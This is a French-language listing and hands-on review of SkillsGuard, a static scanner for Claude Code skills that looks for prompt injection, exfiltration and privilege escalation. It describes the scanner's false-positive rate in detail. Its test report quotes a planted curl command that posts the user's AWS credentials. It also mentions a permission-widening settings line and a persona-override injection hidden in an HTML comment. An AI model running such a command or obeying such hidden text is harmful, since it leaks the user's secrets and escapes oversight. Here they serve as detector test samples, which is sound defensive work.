SkillsGuard

Scanner statique qui audite un SKILL.md pour l'injection, l'exfiltration et l'escalade

par Teycir · Teycir/SkillsGuard

Fonctionne avec configuration ★ 6.8/10

SkillsGuard — Scanner statique qui audite un SKILL.md pour l'injection, l'exfiltration et l'escalade

Ce que fait

Pilote le scanner statique SkillsGuard — 15 catégories de règles couvrant l'injection de prompt, l'exfiltration, l'injection de commandes, la persistance, l'escalade de privilèges, l'obfuscation et la chaîne d'approvisionnement — sur une seule compétence ou un dossier de compétences entier, puis formate les résultats en un verdict groupé par gravité avec une recommandation d'installation / de non-installation. Il décode les blobs base64 et autres blobs obfusqués avant la correspondance, de sorte que les charges utiles cachées dans des chaînes encodées sont signalées avec les preuves décodées. Se déclenche sur des requêtes comme scan this skill, is this skill safe, ou audit my skills folder.

Rapport de test

Le moteur de décodage-d'abord est la vraie affaire : j'ai implanté une compétence dont le setup.sh cachait `curl -X POST -d @<(cat ~/.aws/credentials)` à l'intérieur d'un blob base64, et le scanner l'a décodé et a signalé l'exfiltration de credentials, la ligne d'élargissement des permissions settings.json et l'injection de persona-override enfouie dans un commentaire HTML — 17 découvertes en 16 ms, les trois attaques détectées. La précision est le problème. Dirigé vers une vraie bibliothèque de 278 compétences installées, il a émis 15 480 découvertes et a noté le dossier entier 100/100 CRITICAL, signalant 204 des 278 compétences comme HIGH ou pire ; les deux règles les plus bruyantes correspondent à `rm` et `sh` sans limites de mots, donc tout code markdown inline contenant 'format' ou 'publish' est signalé comme injection de commande. Une compétence de prise de notes inoffensive de 14 lignes dont le seul backtick était `--format markdown` est revenue MEDIUM avec cinq découvertes HIGH d'« injection de commande ». Elle n'est pas non plus sur npm — le SKILL.md seul ne fait rien, et vous devez cloner, npm install, build et npm link (ou configurer le serveur MCP) avant que la compétence n'ait quoi que ce soit à appeler. Utile comme triage rapide avant l'installation sur une compétence suspecte ; ne faites pas confiance à son verdict au niveau du dossier.

Testé le: 2026-08-07 · Claude Code 2.x (agent harness)

Installation

git clone https://github.com/Teycir/SkillsGuard.git
mkdir -p ~/.claude/skills
cp -r SkillsGuard/skill ~/.claude/skills/skillsguard
# scanner CLI is a separate build: cd SkillsGuard && npm install && npm run build && npm link

Commandes et exemples de prompts

  • /skillsguardScanner statique qui audite un SKILL.md pour l'injection, l'exfiltration et l'escalade

Les skills se déclenchent sur des demandes en langage courant — aucune commande à retenir. Après installation, des prompts comme ceux-ci l'activent (en anglais) :

  • Can you scan this skill for prompt injection before I install it?
  • Is this Claude Code skill safe to install, any red flags?
  • Audit my whole ~/.claude/skills folder for exfiltration risks